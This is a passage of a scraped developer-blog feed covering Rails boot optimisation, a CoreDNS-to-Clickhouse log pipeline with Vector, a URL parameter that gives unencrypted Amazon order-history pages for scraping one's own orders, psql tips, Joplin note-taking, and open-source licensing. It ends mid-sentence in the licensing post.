To fix \"         \\\n                        \"this make sure the spring gem is only present \"            \\\n                        \"in `development` and `test` groups in your Gemfile \"       \\\n                        \"and make sure you always use \"                             \\\n                        \"`bundle install --without development test` in production\"\n          end\n        end\n\n        ARGV.replace(args)\n        $0 = command.exec_name\n\n        # Delete all env vars which are unchanged from before Spring started\n        original_env.each { |k, v| ENV.delete k if ENV[k] == v }\n\n        # Load in the current env vars, except those which *were* changed when Spring started\n        env.each { |k, v| ENV[k] ||= v }\n\n        # requiring is faster, so if config.cache_classes was true in\n        # the environment's config file, then we can respect that from\n        # here on as we no longer need constant reloading.\n        if @original_cache_classes\n          ActiveSupport::Dependencies.mechanism = :require\n          Rails.application.config.cache_classes = true\n        end\n\n        connect_database\n        srand\n\n        invoke_after_fork_callbacks\n        shush_backtraces\n\n        command.call\n      }\n\n      disconnect_database\n\n      log \"forked #{pid}\"\n      manager.puts pid\n\n      wait pid, streams, client\n    rescue Exception => e\n      log \"exception: #{e}\"\n      manager.puts unless pid\n\n      if streams && !e.is_a?(SystemExit)\n        print_exception(stderr, e)\n        streams.each(&:close)\n      end\n\n      client.puts(1) if pid\n      client.close\n    ensure\n      # Redirect STDOUT and STDERR to prevent from keeping the original FDs\n      # (i.e. to prevent `spring rake -T | grep db` from hanging forever),\n      # even when exception is raised before forking (i.e. preloading).\n      reset_streams\n    end\n\n\nBootsnap is a gem released by shopify by extracting boot time improvements they made in their app. We can categorise them into two parts\nPath prescanning\nKernel#require and Kernel#load are modified to eliminate $LOAD_PATH scans\nActiveSupport::Dependencies.{autoloadable_module?,load_missing_constant,depend_on} are overridden to eliminate scans of ActiveSupport::Dependencies.autoload_paths.\nCompilation Caching\nRubyVM::InstructionSequence.load_iseq is implemented to cache the result of Ruby bytecode compilation\nYAML.load_file is modified to cache the result of loading a YAML object in MessagePack format (or Marshal, if the message uses types unsupported by MessagePack)\nIf you look at the pseudo code above to demonstrate the LOAD_PATH behaviour, you will see that we need to check file existence every time we do a require, which is an io operation and not very cheap to perform. What if we can do something like this?\n\n def require(filename)\n    if $CACHED_PATH[file_name]\n      full_path = $CACHED_PATH[filename]\n    else\n      full_path = $LOAD_PATH.take do |path|\n        File.exist?(File.join(path, filename))\n      end\n    end\n\n    eval File.read(full_path)\n end\n\n\nload path for a library is not something that changes very often, especially for gem paths and standard library paths, bootsnap caches them to save redundant file checks. Not that cache duration and expiration vary with files, so caching them in a constant won’t work. CACHED_PATH is just for reference and not used by the gem.\nAnother important optimization by bootsnap is the compilation cache. 
We covered the Ruby compilation process in the beginning and saw that every single file needs to go through the compilation process every single time it gets loaded. Bootsnap addresses this by caching the YARV code (instruction sequences) and recompiling only when the code changes.\nThere is also optimised YAML loading, by caching the parsed result in an optimised format. Overall, Bootsnap gives impressive benefits, as it works in production as well. We got about a 30% reduction in boot time for our production ecommerce app.\nNote: This was originally presented as an internal tech talk at Sephora; I made some tweaks to the content for a wider audience.",[],{"slug":2073,"title":2074,"link":2075,"pubDate":2076,"contentSnippet":2077,"tags":2078,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"coredns-vector-clickhouse","Analyzing CoreDNS logs with Clickhouse and Vector","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fcoredns-vector-clickhouse\u002F","2021-06-04T18:30:00.000Z","I’ve been toying around with Clickhouse and Vector at my day job and find both of these tools pretty interesting at what they do. A short summary for those unaware of these tools:\nVector helps you build a pipeline for collecting, transforming and processing different kinds of observability data (logs and metrics).\nClickhouse is a columnar DB used as a warehousing tool for generating reports and analytics.\nNow, for context, I use coredns on my personal dev machine as it supports split DNS (routing certain zones to a particular resolver), which I need for accessing internal domains at work. Yep, systemd-resolved can also do this, but I find coredns easier to configure and manage with OpenVPN as well.\nAnyway, so one random evening, I got the idea of dumping CoreDNS logs to Clickhouse. Maaaybe I was still hungover from the Vector\u002FClickhouse work I was doing at work, but nevertheless I was interested in it.\nOverview#\nGather logs from CoreDNS.\nTransform the logs with regex and construct a payload for Clickhouse.\nWrite a schema for the logs table.\nDump to Clickhouse.\nHere’s how the pipeline looks:\n\nCollecting Logs#\nFirst, let’s look at how the raw logs are structured by CoreDNS:\n[INFO] 127.0.0.1:55678 - 21963 \"A IN xpui.app.spotify.com. udp 38 false 512\" NXDOMAIN qr,rd,ra 121 0.061416978s\n[INFO] 127.0.0.1:59333 - 22742 \"AAAA IN incoming.telemetry.mozilla.org. udp 48 false 512\" NOERROR qr,aa,rd,ra 106 0.049235139s\n[INFO] 127.0.0.1:39609 - 47247 \"AAAA IN ping.archlinux.org. udp 36 false 512\" NOERROR qr,rd,ra 140 0.056721154s\nVector provides a variety of sources to collect these logs. Since I am running coredns as a Docker container, the following config shows how to collect logs from a particular container:\n# Filter coredns logs from Docker logs\n[sources.coredns_logs]\n  type = \"docker_logs\" # required\n  docker_host = \"unix:\u002F\u002F\u002Fvar\u002Frun\u002Fdocker.sock\"\n  include_images = [\"coredns\u002Fcoredns\"] # optional, no default\nThe above config basically specifies a Docker host variable and an image name filter.
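(If you don’t run CoreDNS in Docker, the same pipeline should work with Vector’s file source instead; a sketch, where the log path is an assumption and depends on where you write CoreDNS logs:\n\n# Alternative: tail CoreDNS logs from a plain log file\n[sources.coredns_logs]\n  type = \"file\"\n  include = [\"\u002Fvar\u002Flog\u002Fcoredns\u002F*.log\"]\n\nThe rest of the pipeline stays the same, since the transforms below only look at the raw log line.)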
With the docker_logs source, Vector talks to the Docker API over a unix socket and gathers metadata about the container (like container_created_at, container_name, label etc).\nAfter collecting the logs, Vector enriches them with the following metadata:\n{\n    \"container_created_at\": \"2021-06-04T14:18:03.967143133Z\",\n    \"container_id\": \"00c5c4d36ea5b4772b517d3cca7d397c92f72be2a2bf45bb8c430f717fbd331e\",\n    \"container_name\": \"coredns_coredns_1\",\n    \"host\": \"iris\",\n    \"image\": \"coredns\u002Fcoredns\",\n    \"label\": {\n        \"com.docker.compose.config-hash\": \"928d71143c2af6553d551dbbf14140304d53f92378746454fbfeb0382a896d5b\",\n        \"com.docker.compose.container-number\": \"1\",\n        \"com.docker.compose.oneoff\": \"False\",\n        \"com.docker.compose.project\": \"coredns\",\n        \"com.docker.compose.project.config_files\": \"\u002Fhome\u002Fkaran\u002FCode\u002FInfra\u002Fcoredns\u002Fhydra-vpn-compose.yml\",\n        \"com.docker.compose.project.working_dir\": \"\u002Fhome\u002Fkaran\u002FCode\u002FInfra\u002Fcoredns\",\n        \"com.docker.compose.service\": \"coredns\",\n        \"com.docker.compose.version\": \"1.29.2\"\n    },\n    \"message\": \"[INFO] 127.0.0.1:38266 - 20341 \\\"A IN open.spotify.com. udp 34 false 512\\\" NOERROR qr,rd,ra 160 0.300268123s\",\n    \"source_type\": \"docker\",\n    \"stream\": \"stdout\",\n    \"timestamp\": \"2021-06-04T16:13:07.454601872Z\"\n}\n(NOTE: I am using the console sink to dump these logs to STDOUT. It’s pretty handy for inspecting logs.)\n# Print parsed logs to stdout\n[sinks.print]\ntype = \"console\"\ninputs = [\"coredns_logs\"]\nencoding.codec = \"json\"\nAs you can see from the above JSON object, Vector has transformed the log with its own data model. The log line we care about is now inside the .message key. It’s nice to have the other metadata as well.\nTransforming the logs#\nOur objectives at this step:\nDiscard unused fields. We don’t really care about container metadata for this mini-project.\nParse the message field with regex so the parts can be stored in individual columns in our Clickhouse table.\nNow, CoreDNS can emit two kinds of logs (INFO and ERROR).
The error usually happens when the upstream resolver is unreachable or there’s an issue with any of the CoreDNS plugins.\nWe need to write a regex for both cases:\nINFO logs:\n\\[(?P\u003Clevel>[^]]+)]\\s(?P\u003Cserver_addr>[^:]+):(?P\u003Cserver_port>\\S+)\\s+-\\s+(?P\u003Cid>\\S+)\\s+\"(?P\u003Ctype>\\S+)\\s+(?P\u003Cclass>\\S+)\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Cproto>\\S+)\\s+(?P\u003Csize>\\S+)\\s+(?P\u003Cdo>\\S+)\\s+(?P\u003Cbufsize>[^\"]+)\"\\s+(?P\u003Crcode>\\S+)\\s+(?P\u003Crflags>\\S+)\\s+(?P\u003Crsize>\\S+)\\s+(?P\u003Cduration>[\\d\\.]+).*\n\nERROR logs:\n\\[(?P\u003Clevel>ERROR)]\\s+(?P\u003Ccomponent>plugin\\\u002Ferrors):\\s+(?P\u003Ccode>\\S)+\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Ctype>[^:]*):\\s+(?P\u003Cerror_msg>.*)\n\nCombining this with a bunch of other things to remove some fields and construct the final payload, the config looks like this:\n\n# Parse coredns logs\n[transforms.parse_logs]\ntype = \"remap\"\ninputs = [\"coredns_logs\"]\nsource = '''\n# parse the log event.\nts = .timestamp\nlog,err = parse_regex(.message,r'\\[(?P\u003Clevel>[^]]+)]\\s(?P\u003Cserver_addr>[^:]+):(?P\u003Cserver_port>\\S+)\\s+-\\s+(?P\u003Cid>\\S+)\\s+\"(?P\u003Ctype>\\S+)\\s+(?P\u003Cclass>\\S+)\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Cproto>\\S+)\\s+(?P\u003Csize>\\S+)\\s+(?P\u003Cdo>\\S+)\\s+(?P\u003Cbufsize>[^\"]+)\"\\s+(?P\u003Crcode>\\S+)\\s+(?P\u003Crflags>\\S+)\\s+(?P\u003Crsize>\\S+)\\s+(?P\u003Cduration>[\\d\\.]+).*')\nif err !=null {\n    # capture the error log. If the error log also fails to get parsed, the log event is dropped.\n  log = parse_regex!(.message,r'\\[(?P\u003Clevel>ERROR)]\\s+(?P\u003Ccomponent>plugin\u002Ferrors):\\s+(?P\u003Ccode>\\S)+\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Ctype>[^:]*):\\s+(?P\u003Cerror_msg>.*)')\n}\n. = log\n# add timestamp\n.timestamp = ts\n# remove fields we dont care about\ndel(.do)\n'''\ndrop_on_error = true\nApart from the regex matching, we store the timestamp as received from Vector (since CoreDNS logs don’t contain any timestamp information). We delete some fields that we don’t care about.\nVector uses a powerful DSL (called VRL) to do such kinds of transformations on the fly. It has a lot of functions to do almost any kind of transformation on your original event payload. You can invoke vector vrl from the terminal and get a shell to write the above transformations and debug quickly. It proved to be really useful when dealing with such a long regex pattern.\nStoring in Clickhouse#\nFinally, we get to the part where we need to dump these logs into our Clickhouse DB. Here’s the schema for the table where we will be storing these records:\nCREATE DATABASE IF NOT EXISTS `coredns`;\n\nCREATE TABLE IF NOT EXISTS `coredns`.`logs` (\n    `timestamp` DateTime('Asia\u002FKolkata'),\n    `bufsize` Int32,\n    `class` LowCardinality(String),\n    `duration` Float64,\n    `id` Int32,\n    `level` LowCardinality(String),\n    `name` String,\n    `proto` LowCardinality(String),\n    `rcode` LowCardinality(String),\n    `rflags` String,\n    `server_addr` String,\n    `server_port` Int32,\n    `rsize` Int32,\n    `size`  Int32,\n    `type` LowCardinality(String)\n) ENGINE = MergeTree()\nPARTITION BY toYYYYMM(timestamp)\nORDER BY toYYYYMMDD(timestamp)\nTTL timestamp + INTERVAL 1 WEEK;\nKey things to note:\nLowCardinality is used for columns where the data is predictable, to reduce the disk space used.\nClickhouse uses the sort key as the primary key if unspecified. This is the default behaviour.\nTTL for the records is set to 1 week.
After 1 week, all the records will be purged. Since this is my dev machine, I don’t really care about a higher TTL.\nThis also means that the partitioning is never really put to use, since I am partitioning by month but logs are being deleted every week. At this scale it doesn’t really make sense to even have it, but I just included it for posterity.\nUPDATE:\nClickhouse on Twitter clarified that ORDER BY timestamp will have better performance in this context. Usually, if your queries are “last 1h”, “last 5m” based, it is better to not store the sort key in YYYYMMDD format.\n\nNow, we need to instruct Vector to send these logs to Clickhouse:\n\n[sinks.coredns_logs_clickhouse_output]\n  type = \"clickhouse\"\n  inputs = [\"parse_logs\"]\n  compression = \"gzip\"\n  database = \"coredns\"\n  endpoint = \"http:\u002F\u002Flocalhost:8123\"\n  table = \"logs\"\n  encoding.timestamp_format = \"unix\"\n  batch.timeout_secs = 10\nClickhouse offers an HTTP API (which runs on port 8123 by default). Vector takes the input from the previous step (the parse_logs transformation) and sends it to Clickhouse over the HTTP interface. Clickhouse stores datetimes as UNIX timestamps, so before sending the data, Vector can encode certain fields in the payload to a different data type as well (isn’t that cool? 😎).\nQuery Examples#\nI’ve been running this pipeline for 3-4 days, so I have a decent amount of data collected to show for the blog post.\nTotal Count of Queries\nSELECT count(*)\nFROM coredns.logs\n\n┌─count()─┐\n│   16774 │\n└─────────┘\n\n\nTop Query Types\nSELECT\n    count(*) AS total,\n    type\nFROM coredns.logs\nGROUP BY type\nORDER BY total DESC\nLIMIT 5\n\n┌─total─┬─type─┐\n│  9931 │ A    │\n│  6852 │ AAAA │\n└───────┴──────┘\n\n\nTop Query Names\nSELECT\n    count(*) AS total,\n    name\nFROM coredns.logs\nGROUP BY name\nORDER BY total DESC\nLIMIT 5\n\n┌─total─┬─name────────────────────────────┐\n│  2513 │ ping.archlinux.org.             │\n│  1868 │ ws.todoist.com.                 │\n│  1011 │ incoming.telemetry.mozilla.org. │\n│   802 │ vortex.data.microsoft.com.      │\n│   707 │ logs-01.loggly.com.             │\n└───────┴─────────────────────────────────┘\n\n\nMax\u002FMin duration\nSELECT\n    max(duration) AS max,\n    min(duration) AS min\nFROM coredns.logs\nFORMAT Vertical\n\nRow 1:\n──────\nmax: 4.056606352\nmin: 0.000020837\n\n\nTop TLDs Queried\nSELECT\n    count(name) AS total,\n    topLevelDomain(substring(name, 1, -1)) AS tld\nFROM coredns.logs\nGROUP BY tld\nORDER BY total DESC\nLIMIT 10\n\n┌─total─┬─tld──┐\n│ 10666 │ com  │\n│  3950 │ org  │\n│   671 │ net  │\n│   346 │ so   │\n│   288 │ tech │\n│   279 │ io   │\n│   190 │ co   │\n│   167 │ dev  │\n│    82 │ arpa │\n│    43 │ in   │\n└───────┴──────┘\n\n\nWell, that’s all I could think of really. If you’ve some more interesting analysis to get from this data, let me know!\nSummary#\nThe intention behind writing this post is to give an overview of how the entire log collection and processing pipeline works. Using Vector has been an amazing experience; however, the sad bit is that I don’t know Rust and I cannot contribute to some of the issues I’ve opened (even though they are presumably trivial). Maybe I should pick up Rust, finally? 
🤭\nThanks for reading!",[],{"slug":2080,"title":2081,"link":2082,"pubDate":2083,"contentSnippet":2084,"tags":2085,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"amazon-website-order-drm","Amazon Order History Encryption Bypass","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2021\u002F05\u002F14\u002Famazon-website-order-drm\u002F","2021-05-14T00:00:00.000Z","The Amazon US website allows you to export your order history easily by visiting the “Order History Reports” page. No such option seems to exist for the Amazon websites of other countries. I was trying to write a simple scraper for the Amazon India order history page to get the same data, and discovered something interesting: Amazon encrypts the order history page and decrypts it using client-side cryptography¹. If you were to visit the page and check the response HTML, you’d see something like this in the source code (fairly simplified):\n\n\u002F\u002F Define encrypted content in JS\nvar payload = {\n  \"kid\": \"b70014\",\n  \"iv\": \"\u002FHenfXwYrGrrw8ff\",\n  \"ct\": \"Wt78pPcibe8HAdVtoJ8+E9EGwt4IQYNghBMubBy7Zy\u002F...\"\n}\n\u002F\u002F The HTML div to be populated with the decrypted HTML\nvar elementId = \"csd-encrypted-889C1D02..\";\n\u002F\u002F if client side decryption library failed to load\nif (!window.SiegeClientSideDecryption) {\n  window.location.href = \"?disableCsd=missing-library\";\n  return;\n}\n\u002F\u002F Decrypt and populate the div\nSiegeClientSideDecryption.decryptInElementWithId(\n  elementId, payload, {callSource: \"now\"}\n);\n\n\nThe easiest way to scrape past such hurdles is often to just run a complete browser to scrape the site. The browser runs the JavaScript code with the decryption routine, so you can scrape the actual content. However, it is much slower and wastes CPU cycles - I try to avoid it if I can.\n\n    Aside: explanation of the decryption code\n    \nThe server sends some HTML encrypted as a JSON payload (ct is the truncated ciphertext in the snippet above), along with the IV and a key ID. The SiegeClientSideDecryption library is then called to decrypt the payload and set the plaintext result as the inner HTML of the elementId. The code redirects to a different URL in case the decryption library fails to load.\n\n\nI could have spent time parsing the encryption routine, extracting the key and decrypting the payload. But I found a much simpler solution - Amazon offers an alternate URL which disables the encryption. As a fallback, in case the decryption code fails, the page redirects with a query parameter ?disableCsd=missing-library. That disables the client-side decryption mechanism entirely, and the server returns plain HTML.\nSo if you’re trying to scrape Amazon and are stumped by the missing order history in the HTML, try visiting the following URLs instead:\nhttps:\u002F\u002Fwww.amazon.in\u002Fgp\u002Fcss\u002Forder-history?disableCsd=missing-library\nhttps:\u002F\u002Fwww.amazon.co.uk\u002Fgp\u002Fcss\u002Forder-history?disableCsd=missing-library\nhttps:\u002F\u002Fwww.amazon.com\u002Fgp\u002Fcss\u002Forder-history?disableCsd=missing-library\nAmazon also sets a cookie csd-key=disabled but I didn’t experiment with that much.\nRequest My Data\nAnother alternative to scraping is to request Amazon for your data. Check the Retail.OrderHistory CSV files in the data export. The export from amazon.com includes data for other countries as well.
The feature is also available on other Amazon sites:\nAmazon US - Request My Data\nAmazon India - Request My Data\nAmazon UK - Request My Data\nAmazon Germany - Request My Data\nI’m hesitant to call this DRM, but it might qualify as such. ↩",[],{"slug":2087,"title":2088,"link":2089,"pubDate":2090,"contentSnippet":2091,"tags":2092,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"intermediate-postgresql-for-rails-developers-part-0-get-your-enviornoments-ready-html","Intermediate Postgresql for rails developers, Part 0: Get your environment","https:\u002F\u002Faboobacker.in\u002F2021\u002F04\u002F30\u002Fintermediate-postgresql-for-rails-developers-part-0-get-your-enviornoments-ready.html","2021-04-30T17:42:00.000Z","Postgresql is one of the most advanced open source databases available in the market. Adherence to the SQL standards and super cool extra features are a few of the reasons for Postgres being the most popular database in the Rails community. This is neither an introduction to Postgres nor to Rails. This series is for the folks who have been using Rails and Postgres for one or more years.\nIn part 0 we will walk through some tips for a Postgres setup that increases your productivity.\nThe ActiveRecord ORM which is built into Rails provides a lot of cool methods to access the data in a rubyistic way. But it is important to get familiar with the native Postgres tooling for many tasks.\nPsql\npsql is the official command-line client for Postgresql. Rails has a shortcut to open psql using the settings from the database configuration, rails dbconsole, but you can also open it by using the psql command on your command line.\npsql -h localhost -U username databasename\nAbove is the basic syntax for opening the psql console. Once you enter that, you will be greeted with the psql console if the credentials given are correct.\nNow let’s go through a few psql tips.\nBackslash commands\npsql supports a lot of useful configuration options to improve the experience in the Postgresql shell.\n\\timing\nThe timing command adds the time taken to run each command; this is handy when optimizing query performance.\n\n[local] abomk@cv_dump=#SELECT COUNT(id) from users;\n│ 45129 │\n└───────┘\n\n[local] abomk@cv_dump=#\\timing\nTiming is on.\n[local] abomk@cv_dump=#SELECT COUNT(id) from users;\n│ 45129 │\n└───────┘\n\nTime: 8.412 ms\n\n\n\\s\nGet the psql command history; this is handy for documenting the stuff after doing experiments with different queries and much more. You can also choose to save the history by providing a filename as the parameter, as \\s filename.\n\\i filename\nLoad a query from a file. Big queries are often convenient to write in a text editor; \\i enables loading a query from a file and executing it.\n\\e\nThis is another approach to solve the difficulty of writing multi-line queries in a shell environment. When you give the \\e command, psql will open the text editor you set in $EDITOR to edit the query. You can edit and close the file, the content will be copied to the psql shell, and you can execute it.\nYou can find more such commands from postgresqltutorial and pgdash\nManaging multiple versions of postgres\nIt is important to have the same version of Postgres in your development setup as the production version. If you have multiple apps with different Postgres versions, you can use pgenv to configure multiple versions of Postgres locally. There are other options like asdf-postgres\nUse a different pager\nThe default pager is somewhat difficult to read when there are too many columns.
pspg is an alternate pager you can use with Postgres.\nSave your psql settings in your psqlrc\nYou can save the psql configurations we discussed above in a file so that you don’t need to repeat them every time you open the psql shell. Here is my psql configuration for reference:\n\\set ON_ERROR_ROLLBACK interactive\n\\set COMP_KEYWORD_CASE upper\n\\set HISTFILE ~\u002F.psql\u002Fhistory- :DBNAME\n\\set VERBOSITY verbose\n\\set PROMPT1 '%[%033[1m%]%M %n@%\u002F%R%[%033[0m%]%#'\n\\setenv PAGER pspg\n\\pset border 2\n\\pset linestyle unicode\n\\set null '(null)'\n\nYou can find explanations of the individual configurations on the thoughtbot blog\nPgcli\nPgcli is an alternate Postgresql client with additional features like autocompletion of table names and SQL queries.\nWe will go through more tips in the coming articles. While it is not mandatory to follow the above setup for the coming articles, it is good to get hands-on with the psql shell.",[],{"slug":2094,"title":2095,"link":2096,"pubDate":2097,"contentSnippet":2098,"tags":2099,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"how-i-take-notes","How I take Notes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhow-i-take-notes\u002F","2021-04-14T02:40:55.000Z","Over the past 2-3 years, note-taking apps have become all the rage. Note-taking is an extremely subjective topic and a lot of it depends on the individual’s workflow. There’s no one-size-fits-all, and maybe that justifies the ever-expanding landscape of such apps. I’ve tried a few popular ones (Notion, Roam Research) in the recent past but never really stuck with any after the initial hype phase.\nI even collaborated with @iamd3vil to make our own version of a Zettelkasten-based note-taking app. I found the Zettelkasten system to be really useful on paper but then again, I didn’t use it after a few weeks.\nI tried the old-school way of a Bullet Journal (and I did end up liking it quite a lot) but it was not so practical in many cases (like documenting code snippets, URLs etc).\nDisgruntled with all the options, I just had a simple folder on my laptop with some markdown files in it. It was a stop-gap solution until I found something better.\nTL;DR: I’ve been through a pendulum phase of finding a new note-taking app, wasting time setting it up the “proper way” and then just ending up not using it.\nEnter Joplin#\n\nThanks to @shantanugoel who introduced me to Joplin. He’s a heavy user of it as well and that gave me some confidence to try it out. I initially disliked it because of its not-so-great-looking UI theme and how it essentially looked like just an editor. Admittedly, I was proven wrong quickly in my initial judgement. As I gave more time to it, I noticed I kept coming back to Joplin “naturally” and stuck with it because it’s so damn simple to use. People who have tried Notion would know it complicates a lot of simple tasks. You need to create databases to render a simple table, every component is a “block” (a new page) and yes, it’s slow (although they are working on making it better, just to be fair). Notion focuses a lot on team collaboration features, which I didn’t need for my “personal” note-taking system.\nTL;DR: Joplin is fast, it’s open-source, it’s based on Markdown, and it’s simple to use. A tool you just forget exists, because it becomes a natural extension to your workflow. It has a great plugin system that you can use to extend it and build your own utilities on top of it.
The search is based on sqlite3 FTS, which is pretty awesome!\nWorkflow#\nJoplin revolves around the concept of notebooks. Notebooks are broader categories for your content, and you can nest multiple subnotebooks for specific categories.\nI have the following notebooks and subnotebooks in my Joplin setup:\n- Bookmarks\n  - Twitter Threads\n  - HN Threads\n  - Articles\n  - Design Inspo\n  - Youtube Videos\n- Inbox\n  - Links\n  - Adhoc Notes\n- Personal\n  - Finance\n  - Dev Setup\n  - OSS Ideas\n  - Self Hosted Setup\n- Work\n  - Org-Stuff\n  - Redacted\nOver the week, I primarily use the Inbox\u002FAdhoc Notes notebook as a brain dump. I don’t focus much on the structure; the aim is to get the content out and stored. I’m also someone who doesn’t like to keep more than 5 browser tabs open at any time, so I use the Links notebook with Joplin’s Web Clipper service to store links to read later.\nEvery weekend, I clean up these notebooks to achieve “Inbox Zero”. The idea is to move all these ad-hoc notes to their proper notebooks, annotated with tags. All the useful links are moved into the appropriate Bookmarks\u002F... notebook as well. This helps me find stuff quicker at a later time.\nI heavily use tags in all my notebooks, which allows me to have a unified view of the different kinds of stuff I have. For example, the “golang” tag in my Work notes and Personal notes allows me to see all the “golang” stuff together in one place.\nFor stuff that can be shared publicly, I basically copy-paste those notes into my public wiki as well. This allows me to share snippets\u002Fcommands with others, which Joplin cannot do.\nSynchronisation#\nJoplin provides a bunch of different sync options. I’ve tried Dropbox, Nextcloud and AWS S3 targets in the past, but of late there’s a new sync option, Joplin Server, which provides native sync for Joplin files. I found this option to be the best so far because Dropbox\u002FOneNote etc. have API limits, and syncing on an initial device with lots of notes will be time-consuming.\nI self-host this Joplin Sync Server on my server and have configured the Android app and the Desktop app to use this server endpoint as the sync target. So far so good, although it’s a relatively newer sync option so it’s pertinent to have alternate backups.\nBackups and Export#\nJoplin stores all the files locally on a device in a sqlite3 DB. It can export notes in markdown\u002FHTML format; however, the files are all named with the id of the note (and not the title of the note). I found this to be a bit of a drawback; however, one can quickly whip up a small Python script to fix this using the Joplin API.\nJoplin also has the option to export all of the notes and notebooks with their metadata (geolocation, creation time etc) and tags in a custom format called Joplin Export File (JEX). This option is pretty convenient for re-importing into a new Joplin installation as well.\nSidenote for people using Joplin Server: Once https:\u002F\u002Fgithub.com\u002Flaurent22\u002Fjoplin\u002Fissues\u002F4836 gets resolved, it’ll be possible to do joplin sync and cron it, just like other sync targets.\nSupport#\nJoplin is 100% FOSS and is actively developed by @laurent22 and a few other regular contributors. I contribute $5\u002Fmo to laurent22 via GitHub Sponsors. It’s more or less the same amount that most note-taking apps charge for personal use as well, so this is just me expressing gratitude for building such lovely software for the world to use.
I’m not sure of laurent22’s motivations behind building this, and I don’t wanna incorrectly assume anything either, but I guess some amount of financial incentive makes the whole deal sustainable for the open-source ecosystem.\nThanks for reading! It’s been around a year that I’ve been using Joplin, and I posted this blog post only after really, really using it a lot.\nI’d love to know about your note-taking setups too, so please reach out to me on the usual channels that I’m available on and feel free to discuss!\nFin!\n(Bonus Section) Why Not Obsidian#\nYes, Obsidian is comparable to Joplin in a lot of ways. However, there’s a term in the license of Obsidian for personal use that makes it impossible to use it for your work stuff:\nYou need to pay for Obsidian if and only if you use it for revenue-generating, work-related activities in a company that has two or more people. Get a commercial license for each user if that’s the case\nI don’t have a problem with “paying” for software, but such kinda licenses are just BS.",[],{"slug":2101,"title":2102,"link":2103,"pubDate":2104,"contentSnippet":2105,"tags":2106,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"intellectual-property-open-source-and-mimemagic-html","Intellectual property, Open source and mimemagic","https:\u002F\u002Faboobacker.in\u002F2021\u002F03\u002F28\u002Fintellectual-property-open-source-and-mimemagic.html","2021-03-28T18:47:00.000Z","The alleged GPL violation in a ruby library called mimemagic, which broke builds of Rails projects across the world, brought up the discussion of intellectual property in the software world one more time last week. It is important for a software developer to have a general idea about these terms to avoid getting into big trouble in the future.\nThis is my attempt to write down my understanding of open source and intellectual property. I am not a lawyer, and the implementation of IP is based on local laws, which are not universal.\nThough the modern concept of IP originated from exclusive access to rights and grants by the British monarch, it soon became a mechanism to promote the creation of intellectual goods, by giving inventors some rights to the work they made.\nThough IP may sound like an alien term, it is critical for any company; for instance, the company name, logo, design of the logo etc. are trademarks, which are a kind of intellectual property. Trademarks enable companies to protect the reputation and goodwill of the brand by preventing others from copying the same brand symbols to sell their products.\nContent produced by a company is protected by copyright, and this also includes the software they make. In almost all legislations, content produced is inherently owned by the author and protected by copyright; this prevents unauthorized use and redistribution of the content by other people.\nAnother important intellectual property is the patent, which provides protection for innovative ideas. Unlike copyright, a patent requires registration with a government agency within a particular timeframe. In general, a patent protects an idea and copyright protects the manifestation of that idea.\nThere are other IPs, like trade secrets, which I am not covering here to limit the scope of the article.\nHistorically, hardware was the most expensive part of a computer, and the program or software that ran on it wasn’t valued as important.
But as more software distribution patterns emerged, people started distributing just binaries of the software, which prevented users from changing the software as per their needs. Richard M. Stallman, who was working in the MIT AI lab during this period, ran into big trouble because of this: they used to adjust their printer’s firmware as per their paper-size needs, but the new printer firmware came in binary format only, which prevented them from making the modification and caused wastage of the paper they already had. Stallman requested that the firmware owner share the source code, but he refused.\nThat incident hit him hard, as the usage of a computer owned by the user was being dictated by the firmware owner. He believed this was a big ethical and social issue. He launched the GNU project in 1983 to create an operating system consisting of only free software. In his own words, “free” as in “free speech,” not as in “free beer”. Many, including Linux, followed this approach, and many free software programs became available in the market.\nIn the late 90s, some people in the industry realized the advantage of having free software in the enterprise world, i.e. when the code is shared, more people can learn from and adapt it, thereby saving time and cost. They also coined the term “open source”, since people may easily interpret free software as free-of-cost software.\nWhile free software and open source software are practically largely the same, they are two movements with different motivations but almost the same path to achieve their goals. While the free software movement is from the perspective of the user having full control of his\u002Fher system, open source is from the perspective of a software engineer or company getting benefit from shared source code.\nThe Open Source Initiative formalized open source with 10 rules and lists software licenses compatible with these rules as open source licenses.\nBut why does open source software need a license?\nThe answer is simple: as we discussed in the initial section, any content produced is owned by the author, and others can’t redistribute it without the author’s permission. Licenses are a contract from a software developer to the user, sharing some of his\u002Fher\u002Ftheir rights with the user; in the case of open source, that will be the freedom to redistribute, make derived works etc. In other words, open source licenses grant certain IP rights to users who are subject to the license. This is different from the EULA (End User License Agreement) we see in proprietary software, which limits what the user can do with the software they purchased.\nAlso keep in mind that open source is not public domain, which is work that is not owned by anyone.\nThere are many kinds of open source licenses, ranging from permissive licenses, which don’t ask the users for anything more than attribution, to copyleft licenses, which mandate that you make your software open source as well if you use one in your software.\nI’ll be writing about commonly used licenses and things to take care of while using such licenses in another post; till then, you can refer to this awesome website.\nNow let’s go back to the incident that happened last week. freedesktop is a project on interoperability between free software projects; they maintain the list of MIME types, and it is licensed under the GPL. The GPL is a very restrictive license: if you want to link your software to GPLed software and distribute it, then you will have to license your software with the same restrictions.
In other words, you can’t directly link your software with GPLed software\u002Fcode and distribute it under a proprietary or permissive open source license like MIT. The mimemagic gem, which is MIT licensed, used this GPLed code from freedesktop, which is a violation of the GPL. The initial fix was to convert the mimemagic license to GPL. But due to the nature of copyleft licenses, software which includes mimemagic would then also have to comply with the GPL rules. So they later removed the GPLed file and made the library use the MIME data from the user’s computer.\nThis may raise some questions about using GPL programs with your closed source projects (projects which are not open source). First, you don’t have to care much about the GPL in the backend of a software-as-a-service model, as most websites do, since you are just distributing the output of the software, not the software itself, to the end user; this is also called the SaaS loophole. Even if you aren’t, it is unlikely that MySQL is part of your source code; if you are just using MySQL as a database, you are using its SQL interface, and it is not part of your programs.\nNow let’s look at the common errors developers make due to lack of awareness about IP:\nCopying and pasting snippets from Stack Overflow (read more here).\nCopying open source code snippets from GitHub\nEven if the code is 